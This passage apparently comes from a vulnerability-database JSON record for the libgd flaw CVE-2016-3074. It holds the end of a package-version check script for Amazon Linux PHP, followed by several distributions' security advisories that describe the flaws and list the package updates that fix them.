if(!isnull(res = isrpmvuln(pkg:\"php56-pgsql\", rpm:\"php56-pgsql~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-fpm\", rpm:\"php56-fpm~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-bcmath\", rpm:\"php56-bcmath~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-xmlrpc\", rpm:\"php56-xmlrpc~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-dba\", rpm:\"php56-dba~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-devel\", rpm:\"php56-devel~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-pdo\", rpm:\"php56-pdo~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-snmp\", rpm:\"php56-snmp~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-opcache\", rpm:\"php56-opcache~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-mssql\", rpm:\"php56-mssql~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-recode\", rpm:\"php56-recode~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-odbc\", rpm:\"php56-odbc~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-gmp\", rpm:\"php56-gmp~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-gd\", rpm:\"php56-gd~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-pspell\", rpm:\"php56-pspell~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"php56\", rpm:\"php56~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-soap\", rpm:\"php56-soap~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-mbstring\", rpm:\"php56-mbstring~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-process\", rpm:\"php56-process~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-tidy\", rpm:\"php56-tidy~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-imap\", rpm:\"php56-imap~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-dbg\", rpm:\"php56-dbg~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-enchant\", rpm:\"php56-enchant~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:39", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3074"], "description": "A heap-based buffer overflow caused by an integer signedness error has\nbeen found in the libgd code handling compressed gd2 chunks.", "modified": "2016-05-06T00:00:00", "published": "2016-05-06T00:00:00", "id": "ASA-201605-8", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-May/000615.html", "type": "archlinux", "title": "gd: arbitrary code execution", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:50", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9709", "CVE-2016-3074", "CVE-2014-2497"], "edition": 1, "description": "### 
Background\n\nGD is a graphic library for fast image creation.\n\n### Description\n\nMultiple vulnerabilities have been discovered in GD. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll GD users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-libs/gd-2.2.2\"", "modified": "2016-07-16T00:00:00", "published": "2016-07-16T00:00:00", "id": "GLSA-201607-04", "href": "https://security.gentoo.org/glsa/201607-04", "type": "gentoo", "title": "GD: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-01T00:54:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7414", "CVE-2016-5385", "CVE-2016-6290", "CVE-2016-7127", "CVE-2016-7133", "CVE-2016-4540", "CVE-2016-4538", "CVE-2016-7131", "CVE-2016-4544", "CVE-2016-7125", "CVE-2015-8865", "CVE-2016-7134", "CVE-2016-7130", "CVE-2016-4543", "CVE-2016-4542", "CVE-2016-7129", "CVE-2016-4541", "CVE-2016-7413", "CVE-2016-7126", "CVE-2016-6295", "CVE-2016-6297", "CVE-2016-6292", "CVE-2016-7416", "CVE-2016-6289", "CVE-2016-7411", "CVE-2016-4539", "CVE-2016-3074", "CVE-2016-7124", "CVE-2016-4073", "CVE-2016-7417", "CVE-2016-6294", "CVE-2016-7128", "CVE-2016-7418", "CVE-2016-7132", "CVE-2016-4072", "CVE-2016-6291", "CVE-2016-4071", "CVE-2016-6296", "CVE-2016-4537", "CVE-2016-7412"], "edition": 1, "description": "### Background\n\nPHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. \n\n### Description\n\nMultiple vulnerabilities have been discovered in PHP. Please review the CVE identifiers referenced below for details. 
\n\n### Impact\n\nAn attacker can possibly execute arbitrary code or create a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll PHP users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev=lang/php-5.6.28\"", "modified": "2016-11-30T00:00:00", "published": "2016-11-30T00:00:00", "href": "https://security.gentoo.org/glsa/201611-22", "id": "GLSA-201611-22", "type": "gentoo", "title": "PHP: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:34:02", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9709", "CVE-2015-8877", "CVE-2015-8874", "CVE-2016-3074", "CVE-2014-2497"], "description": "It was discovered that the GD library incorrectly handled certain color \ntables in XPM images. If a user or automated system were tricked into \nprocessing a specially crafted XPM image, an attacker could cause a denial \nof service. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. \n(CVE-2014-2497)\n\nIt was discovered that the GD library incorrectly handled certain malformed \nGIF images. If a user or automated system were tricked into processing a \nspecially crafted GIF image, an attacker could cause a denial of service. \nThis issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. \n(CVE-2014-9709)\n\nIt was discovered that the GD library incorrectly handled memory when using \ngdImageFillToBorder(). A remote attacker could possibly use this issue to \ncause a denial of service. (CVE-2015-8874)\n\nIt was discovered that the GD library incorrectly handled memory when using \ngdImageScaleTwoPass(). A remote attacker could possibly use this issue to \ncause a denial of service. This issue only applied to Ubuntu 14.04 LTS, \nUbuntu 15.10 and Ubuntu 16.04 LTS. 
(CVE-2015-8877)\n\nHans Jerry Illikainen discovered that the GD library incorrectly handled \ncertain malformed GD images. If a user or automated system were tricked \ninto processing a specially crafted GD image, an attacker could cause a \ndenial of service or possibly execute arbitrary code. (CVE-2016-3074)", "edition": 5, "modified": "2016-05-31T00:00:00", "published": "2016-05-31T00:00:00", "id": "USN-2987-1", "href": "https://ubuntu.com/security/notices/USN-2987-1", "title": "GD library vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:42", "bulletinFamily": "software", "cvelist": ["CVE-2014-9709", "CVE-2015-8877", "CVE-2015-8874", "CVE-2016-3074", "CVE-2014-2497"], "description": "USN-2987-1 GD library vulnerabilities\n\n# \n\nMedium\n\n# Vendor\n\nlibgd2, Canonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04 LTS \n\n# Description\n\nIt was discovered that the GD library incorrectly handled certain color tables in XPM images. If a user or automated system were tricked into processing a specially crafted XPM image, an attacker could cause a denial of service. ([CVE-2014-2497](<http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-2497.html>))\n\nIt was discovered that the GD library incorrectly handled certain malformed GIF images. If a user or automated system were tricked into processing a specially crafted GIF image, an attacker could cause a denial of service. ([CVE-2014-9709](<http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-9709.html>))\n\nIt was discovered that the GD library incorrectly handled memory when using gdImageFillToBorder(). A remote attacker could possibly use this issue to cause a denial of service. ([CVE-2015-8874](<http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-8874.html>))\n\nIt was discovered that the GD library incorrectly handled memory when using gdImageScaleTwoPass(). 
A remote attacker could possibly use this issue to cause a denial of service. ([CVE-2015-8877](<http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-8877.html>))\n\nHans Jerry Illikainen discovered that the GD library incorrectly handled certain malformed GD images. If a user or automated system were tricked into processing a specially crafted GD image, an attacker could cause a denial of service or possibly execute arbitrary code. ([CVE-2016-3074](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3074.html>))\n\n# Affected Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * All versions of Cloud Foundry cflinuxfs2 prior to v.1.64.0 \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 v.1.64.0 or later versions \n\n# Credit\n\nHans Jerry Illikainen\n\n# References\n\n * <http://www.ubuntu.com/usn/usn-2987-1/>\n * <http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-2497.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-9709.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-8874.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-8877.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3074.html>\n", "edition": 5, "modified": "2016-06-13T00:00:00", "published": "2016-06-13T00:00:00", "id": "CFOUNDRY:29A67C6EFF8B00905B423AF785FD3E4C", "href": "https://www.cloudfoundry.org/blog/usn-2987-1/", "title": "USN-2987-1 GD library vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:35:01", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8865", "CVE-2016-4070", "CVE-2016-3074", "CVE-2016-4073", "CVE-2016-4072", "CVE-2016-4071"], "description": "**Issue Overview:**\n\nThe following 
security-related issues were resolved:\n\nBuffer over-write in finfo_open with malformed magic file ([CVE-2015-8865 __](<https://access.redhat.com/security/cve/CVE-2015-8865>)) \nSignedness vulnerability causing heap overflow in libgd ([CVE-2016-3074 __](<https://access.redhat.com/security/cve/CVE-2016-3074>)) \nInteger overflow in php_raw_url_encode ([CVE-2016-4070 __](<https://access.redhat.com/security/cve/CVE-2016-4070>)) \nFormat string vulnerability in php_snmp_error() ([CVE-2016-4071 __](<https://access.redhat.com/security/cve/CVE-2016-4071>)) \nInvalid memory write in phar on filename containing \\\\\\0 inside name ([CVE-2016-4072 __](<https://access.redhat.com/security/cve/CVE-2016-4072>)) \nNegative size parameter in memcpy ([CVE-2016-4073 __](<https://access.redhat.com/security/cve/CVE-2016-4073>))\n\n \n**Affected Packages:** \n\n\nphp56, php55\n\n \n**Issue Correction:** \nRun _yum update php56_ to update your system. \nRun _yum update php55_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n php55-mbstring-5.5.35-1.114.amzn1.i686 \n php55-intl-5.5.35-1.114.amzn1.i686 \n php55-tidy-5.5.35-1.114.amzn1.i686 \n php55-pdo-5.5.35-1.114.amzn1.i686 \n php55-enchant-5.5.35-1.114.amzn1.i686 \n php55-mcrypt-5.5.35-1.114.amzn1.i686 \n php55-xmlrpc-5.5.35-1.114.amzn1.i686 \n php55-pspell-5.5.35-1.114.amzn1.i686 \n php55-snmp-5.5.35-1.114.amzn1.i686 \n php55-debuginfo-5.5.35-1.114.amzn1.i686 \n php55-xml-5.5.35-1.114.amzn1.i686 \n php55-embedded-5.5.35-1.114.amzn1.i686 \n php55-gd-5.5.35-1.114.amzn1.i686 \n php55-5.5.35-1.114.amzn1.i686 \n php55-gmp-5.5.35-1.114.amzn1.i686 \n php55-recode-5.5.35-1.114.amzn1.i686 \n php55-cli-5.5.35-1.114.amzn1.i686 \n php55-devel-5.5.35-1.114.amzn1.i686 \n php55-common-5.5.35-1.114.amzn1.i686 \n php55-mssql-5.5.35-1.114.amzn1.i686 \n php55-dba-5.5.35-1.114.amzn1.i686 \n php55-bcmath-5.5.35-1.114.amzn1.i686 \n php55-pgsql-5.5.35-1.114.amzn1.i686 \n php55-fpm-5.5.35-1.114.amzn1.i686 \n 
php55-opcache-5.5.35-1.114.amzn1.i686 \n php55-imap-5.5.35-1.114.amzn1.i686 \n php55-mysqlnd-5.5.35-1.114.amzn1.i686 \n php55-odbc-5.5.35-1.114.amzn1.i686 \n php55-process-5.5.35-1.114.amzn1.i686 \n php55-soap-5.5.35-1.114.amzn1.i686 \n php55-ldap-5.5.35-1.114.amzn1.i686 \n php56-cli-5.6.21-1.124.amzn1.i686 \n php56-embedded-5.6.21-1.124.amzn1.i686 \n php56-ldap-5.6.21-1.124.amzn1.i686 \n php56-common-5.6.21-1.124.amzn1.i686 \n php56-intl-5.6.21-1.124.amzn1.i686 \n php56-mcrypt-5.6.21-1.124.amzn1.i686 \n php56-mysqlnd-5.6.21-1.124.amzn1.i686 \n php56-xml-5.6.21-1.124.amzn1.i686 \n php56-debuginfo-5.6.21-1.124.amzn1.i686 \n php56-pgsql-5.6.21-1.124.amzn1.i686 \n php56-fpm-5.6.21-1.124.amzn1.i686 \n php56-bcmath-5.6.21-1.124.amzn1.i686 \n php56-xmlrpc-5.6.21-1.124.amzn1.i686 \n php56-dba-5.6.21-1.124.amzn1.i686 \n php56-devel-5.6.21-1.124.amzn1.i686 \n php56-pdo-5.6.21-1.124.amzn1.i686 \n php56-snmp-5.6.21-1.124.amzn1.i686 \n php56-opcache-5.6.21-1.124.amzn1.i686 \n php56-mssql-5.6.21-1.124.amzn1.i686 \n php56-recode-5.6.21-1.124.amzn1.i686 \n php56-odbc-5.6.21-1.124.amzn1.i686 \n php56-gmp-5.6.21-1.124.amzn1.i686 \n php56-gd-5.6.21-1.124.amzn1.i686 \n php56-pspell-5.6.21-1.124.amzn1.i686 \n php56-5.6.21-1.124.amzn1.i686 \n php56-soap-5.6.21-1.124.amzn1.i686 \n php56-mbstring-5.6.21-1.124.amzn1.i686 \n php56-process-5.6.21-1.124.amzn1.i686 \n php56-tidy-5.6.21-1.124.amzn1.i686 \n php56-imap-5.6.21-1.124.amzn1.i686 \n php56-dbg-5.6.21-1.124.amzn1.i686 \n php56-enchant-5.6.21-1.124.amzn1.i686 \n \n src: \n php55-5.5.35-1.114.amzn1.src \n php56-5.6.21-1.124.amzn1.src \n \n x86_64: \n php55-devel-5.5.35-1.114.amzn1.x86_64 \n php55-gd-5.5.35-1.114.amzn1.x86_64 \n php55-enchant-5.5.35-1.114.amzn1.x86_64 \n php55-mysqlnd-5.5.35-1.114.amzn1.x86_64 \n php55-intl-5.5.35-1.114.amzn1.x86_64 \n php55-imap-5.5.35-1.114.amzn1.x86_64 \n php55-pgsql-5.5.35-1.114.amzn1.x86_64 \n php55-5.5.35-1.114.amzn1.x86_64 \n php55-bcmath-5.5.35-1.114.amzn1.x86_64 \n 
php55-dba-5.5.35-1.114.amzn1.x86_64 \n php55-mssql-5.5.35-1.114.amzn1.x86_64 \n php55-process-5.5.35-1.114.amzn1.x86_64 \n php55-xml-5.5.35-1.114.amzn1.x86_64 \n php55-pspell-5.5.35-1.114.amzn1.x86_64 \n php55-recode-5.5.35-1.114.amzn1.x86_64 \n php55-pdo-5.5.35-1.114.amzn1.x86_64 \n php55-xmlrpc-5.5.35-1.114.amzn1.x86_64 \n php55-snmp-5.5.35-1.114.amzn1.x86_64 \n php55-fpm-5.5.35-1.114.amzn1.x86_64 \n php55-ldap-5.5.35-1.114.amzn1.x86_64 \n php55-gmp-5.5.35-1.114.amzn1.x86_64 \n php55-embedded-5.5.35-1.114.amzn1.x86_64 \n php55-mcrypt-5.5.35-1.114.amzn1.x86_64 \n php55-odbc-5.5.35-1.114.amzn1.x86_64 \n php55-common-5.5.35-1.114.amzn1.x86_64 \n php55-tidy-5.5.35-1.114.amzn1.x86_64 \n php55-mbstring-5.5.35-1.114.amzn1.x86_64 \n php55-cli-5.5.35-1.114.amzn1.x86_64 \n php55-opcache-5.5.35-1.114.amzn1.x86_64 \n php55-debuginfo-5.5.35-1.114.amzn1.x86_64 \n php55-soap-5.5.35-1.114.amzn1.x86_64 \n php56-opcache-5.6.21-1.124.amzn1.x86_64 \n php56-5.6.21-1.124.amzn1.x86_64 \n php56-debuginfo-5.6.21-1.124.amzn1.x86_64 \n php56-mcrypt-5.6.21-1.124.amzn1.x86_64 \n php56-fpm-5.6.21-1.124.amzn1.x86_64 \n php56-bcmath-5.6.21-1.124.amzn1.x86_64 \n php56-ldap-5.6.21-1.124.amzn1.x86_64 \n php56-xmlrpc-5.6.21-1.124.amzn1.x86_64 \n php56-intl-5.6.21-1.124.amzn1.x86_64 \n php56-dba-5.6.21-1.124.amzn1.x86_64 \n php56-embedded-5.6.21-1.124.amzn1.x86_64 \n php56-common-5.6.21-1.124.amzn1.x86_64 \n php56-mysqlnd-5.6.21-1.124.amzn1.x86_64 \n php56-tidy-5.6.21-1.124.amzn1.x86_64 \n php56-gmp-5.6.21-1.124.amzn1.x86_64 \n php56-recode-5.6.21-1.124.amzn1.x86_64 \n php56-enchant-5.6.21-1.124.amzn1.x86_64 \n php56-process-5.6.21-1.124.amzn1.x86_64 \n php56-xml-5.6.21-1.124.amzn1.x86_64 \n php56-devel-5.6.21-1.124.amzn1.x86_64 \n php56-gd-5.6.21-1.124.amzn1.x86_64 \n php56-cli-5.6.21-1.124.amzn1.x86_64 \n php56-soap-5.6.21-1.124.amzn1.x86_64 \n php56-odbc-5.6.21-1.124.amzn1.x86_64 \n php56-snmp-5.6.21-1.124.amzn1.x86_64 \n php56-mssql-5.6.21-1.124.amzn1.x86_64 \n 
php56-imap-5.6.21-1.124.amzn1.x86_64 \n php56-pspell-5.6.21-1.124.amzn1.x86_64 \n php56-mbstring-5.6.21-1.124.amzn1.x86_64 \n php56-pdo-5.6.21-1.124.amzn1.x86_64 \n php56-pgsql-5.6.21-1.124.amzn1.x86_64 \n php56-dbg-5.6.21-1.124.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2016-05-03T10:30:00", "published": "2016-05-03T10:30:00", "id": "ALAS-2016-698", "href": "https://alas.aws.amazon.com/ALAS-2016-698.html", "title": "Important: php56, php55", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:18:18", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8867", "CVE-2016-4070", "CVE-2016-3074", "CVE-2016-4073", "CVE-2015-8866", "CVE-2016-4071"], "description": "This update for php5 fixes the following issues:\n\n - CVE-2016-4073: A remote attacker could have caused denial of service, or\n possibly execute arbitrary code, due to incorrect handling of string\n length calculations in mb_strcut() (bsc#977003)\n - CVE-2016-3074: Signedness vulnerability in bundled libgd may have\n resulted in a heap overflow when processing compressed gd2 data.\n (boo#976775)\n - CVE-2015-8867: The PHP function openssl_random_pseudo_bytes() did not\n return cryptographically secure random bytes (bsc#977005)\n - CVE-2016-4070: The libxml_disable_entity_loader() setting was shared\n between threads, which could have resulted in XML external entity\n injection and entity expansion issues (bsc#976997)\n - CVE-2015-8866: A remote attacker could have caused denial of service due\n to incorrect handling of large strings in php_raw_url_encode()\n (bsc#976996)\n - CVE-2016-4071: A remote attacker could have caused denial of service, or\n possibly execute arbitrary code, due to incorrect handling of string\n formatting in php_snmp_error() (bsc#977000)\n\n", "edition": 1, "modified": "2016-05-11T14:07:47", "published": "2016-05-11T14:07:47", "id": "OPENSUSE-SU-2016:1274-1", "href": 
"http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00031.html", "type": "suse", "title": "Security update for php5 (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:30:16", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8873", "CVE-2015-8879", "CVE-2013-7456", "CVE-2015-8877", "CVE-2015-8874", "CVE-2015-4116", "CVE-2016-5093", "CVE-2016-3074", "CVE-2016-5094", "CVE-2016-5095", "CVE-2016-5096", "CVE-2016-5114", "CVE-2015-8876"], "description": "This update for php5 fixes the following issues:\n\n - CVE-2013-7456: imagescale out-of-bounds read (bnc#982009).\n - CVE-2016-5093: get_icu_value_internal out-of-bounds read (bnc#982010).\n - CVE-2016-5094: Don't create strings with lengths outside int range\n (bnc#982011).\n - CVE-2016-5095: Don't create strings with lengths outside int range\n (bnc#982012).\n - CVE-2016-5096: int/size_t confusion in fread (bsc#982013).\n - CVE-2016-5114: fpm_log.c memory leak and buffer overflow (bnc#982162).\n - CVE-2015-8877: The gdImageScaleTwoPass function in gd_interpolation.c in\n the GD Graphics Library (aka libgd), as used in PHP, used inconsistent\n allocate and free approaches, which allowed remote attackers to cause a\n denial of service (memory consumption) via a crafted call, as\n demonstrated by a call to the PHP imagescale function (bsc#981061).\n - CVE-2015-8876: Zend/zend_exceptions.c in PHP did not validate certain\n Exception objects, which allowed remote attackers to cause a denial of\n service (NULL pointer dereference and application crash) or trigger\n unintended method execution via crafted serialized data (bsc#981049).\n - CVE-2015-8879: The odbc_bindcols function in ext/odbc/php_odbc.c in PHP\n mishandled driver behavior for SQL_WVARCHAR columns, which allowed\n remote attackers to cause a denial of service (application crash) in\n opportunistic circumstances by leveraging use of the odbc_fetch_array\n function to 
access a certain type of Microsoft SQL Server table Aliased:\n (bsc#981050).\n - CVE-2015-4116: Use-after-free vulnerability in the spl_ptr_heap_insert\n function in ext/spl/spl_heap.c in PHP allowed remote attackers to\n execute arbitrary code by triggering a failed SplMinHeap::compare\n operation (bsc#980366).\n - CVE-2015-8874: Stack consumption vulnerability in GD in PHP allowed\n remote attackers to cause a denial of service via a crafted\n imagefilltoborder call (bsc#980375).\n - CVE-2015-8873: Stack consumption vulnerability in Zend/zend_exceptions.c\n in PHP allowed remote attackers to cause a denial of service\n (segmentation fault) via recursive method calls (bsc#980373).\n - CVE-2016-3074: Integer signedness error in GD Graphics Library (aka\n libgd or libgd2) allowed remote attackers to cause a denial of service\n (crash) or potentially execute arbitrary code via crafted compressed gd2\n data, which triggers a heap-based buffer overflow (bsc#976775).\n\n", "edition": 1, "modified": "2016-06-11T14:14:42", "published": "2016-06-11T14:14:42", "id": "OPENSUSE-SU-2016:1553-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00015.html", "title": "Security update for php5 (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cloudlinux": [{"lastseen": "2020-11-25T15:43:32", "bulletinFamily": "unix", "cvelist": ["CVE-2006-7243", "CVE-2011-4718", "CVE-2014-9653", "CVE-2014-9767", "CVE-2015-0235", "CVE-2015-2331", "CVE-2015-2348", "CVE-2015-3152", "CVE-2015-3330", "CVE-2015-3411", "CVE-2015-4025", "CVE-2015-4026", "CVE-2015-4598", "CVE-2015-5590", "CVE-2015-6831", "CVE-2015-6833", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7804", "CVE-2015-8835", "CVE-2015-8867", "CVE-2015-8876", "CVE-2015-8879", "CVE-2016-10159", "CVE-2016-10160", "CVE-2016-10161", "CVE-2016-2554", "CVE-2016-3074", "CVE-2016-4073", "CVE-2016-4343", "CVE-2016-4537", 
"CVE-2016-4540", "CVE-2016-4541", "CVE-2016-4542", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-5096", "CVE-2016-5399", "CVE-2016-5766", "CVE-2016-5772", "CVE-2016-6288", "CVE-2016-6289", "CVE-2016-6290", "CVE-2016-6291", "CVE-2016-6294", "CVE-2016-6296", "CVE-2016-6297", "CVE-2016-7128", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7478", "CVE-2016-8670", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-7890", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2018-5712", "CVE-2019-11048", "CVE-2019-13224", "CVE-2019-9023", "CVE-2020-7067", "CVE-2020-7070"], "description": "- Fix bug #69720: Null pointer dereference in phar_get_fp_offset()\n- Fix bug #70728: Type Confusion Vulnerability in PHP_to_XMLRPC_worker()\n- Fix bug #70661: Use After Free Vulnerability in WDDX Packet Deserialization\n- Fix bug #70741: Session WDDX Packet Deserialization Type Confusion Vulnerability\n- Fix bug #71459: Integer overflow in iptcembed()\n- Fix bug #71039: exec functions ignore length but look for NULL termination\n- Fix bug #71354: Heap corruption in tar/zip/phar parser.\n- Fix bug #71391: NULL Pointer Dereference in phar_tar_setupmetadata()\n- Fix bug #71323: Output of stream_get_meta_data can be falsified by its input\n- Fix bug #71498: Out-of-Bound Read in phar_parse_zipfile()\n- Fix bug #71587: Use-After-Free / Double-Free in WDDX Deserialize\n- Fix bug #71860: Invalid memory write in phar on filename with \\0 in name\n- Fix bug #71798: Integer Overflow in php_raw_url_encode\n- Fix bug #72837: integer overflow in bzdecompress caused heap corruption\n- Fix bug #72681: PHP Session Data Injection Vulnerability\n- Fix bug #72807: integer overflow in curl_escape caused heap corruption\n- Fix bug #72838: Integer overflow lead to heap corruption in sql_regcase\n- Fix bug #72697: select_colors write out-of-bounds\n- Fix bug #72730: imagegammacorrect allows arbitrary write access\n- Fix bug #72836: 
integer overflow in base64_decode caused heap corruption\n- Fix bug #72848: integer overflow in quoted_printable_encode caused heap corruption\n- Fix bug #72849: integer overflow in urlencode caused heap corruption\n- Fix bug #72850: integer overflow in php_uuencode caused heap corruption\n- Fix bug #72771: ftps:// wrapper is vulnerable to protocol downgrade attack\n- Fix bug #72749: wddx_deserialize allows illegal memory access\n- Fix bug #72750: wddx_deserialize null dereference\n- Fix bug #72790: wddx_deserialize null dereference with invalid xml\n- Fix bug #72799: wddx_deserialize null dereference in php_wddx_pop_element\n- Fix bug #73189: Memcpy negative size parameter php_resolve_path\n- Fix bug #73150: missing NULL check in dom_document_save_html\n- Fix bug #73284: heap overflow in php_ereg_replace function\n- Fix bug #73218: stack-buffer-overflow through "ResourceBundle" methods\n- Fix bug #73208: integer overflow in imap_8bit caused heap corruption\n- Fix bug #73082: string length overflow in mb_encode_* function\n- Fix bug #73174: heap overflow in php_pcre_replace_impl\n- Fix bug #73276: crash in openssl_random_pseudo_bytes function\n- Fix bug #73275: crash in openssl_encrypt function\n- Fix bug #73017: memory corruption in wordwrap function\n- Fix bug #73240: Write out of bounds at number_format\n- Fix bug #73073: CachingIterator null dereference when convert to string\n- Fix bug #73293: NULL pointer dereference in SimpleXMLElement::asXML()\n- Fix bug #73356: crash in bzcompress function\n- Fix bug #72696: imagefilltoborder stackoverflow on truecolor images\n- Fix bug #73418: Integer Overflow in "_php_imap_mail" leads Heap Overflow\n- Fix bug #73144: Use-after-free in ArrayObject Deserialization\n- Fix bug #73192: parse_url return wrong hostname\n- Fix bug #73331: NULL Pointer Dereference in WDDX Packet Deserialization with PDORow\n- Fix bug #73452: Segfault (Regression for #69152)\n- Fix bug #73631: Invalid read when wddx decodes empty boolean 
